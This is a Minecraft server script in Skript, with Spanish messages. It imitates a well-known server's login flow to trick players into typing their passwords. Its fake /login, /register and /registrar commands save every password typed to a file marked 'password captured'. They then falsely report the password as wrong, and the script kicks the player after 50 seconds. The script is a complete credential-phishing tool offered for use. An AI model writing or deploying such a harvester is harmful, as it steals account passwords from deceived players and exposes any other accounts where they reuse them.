on join:
	execute console command "mv tp %player% mc_universocraft_com"
	wf "    [CONECTADO] %player% ha entrado al servidor." to "datos.txt"
	message "&9&lCuenta &7» &a¡Inicia sesión: &e/login <tucontraseña>"
	wait 50 seconds
	kick the player due to "&9&lCuenta &7» &cTu tiempo de espera para entrar se ha agotado."

on quit:
	wf "    [DESCONECTADO] %player% ha salido del servidor." to "datos.txt"

on chat:
	cancel event

command /login [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/login <tucontraseña>"
		if arg-1 is set:
			wf "    [LOGIN] Contraseña capturada! usuario: %player% contraseña: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cContraseña incorrecta."
		
command /register [<text>] [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-1 is set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-2 is set:
			wf "    [REGISTER] Contraseña capturada! usuario: %player% contraseña: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cYa estás registrado."

command /registrar [<text>] [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-1 is set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-2 is set:
			wf "    [REGISTER] Contraseña capturada! usuario: %player% contraseña: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cYa estás registrado."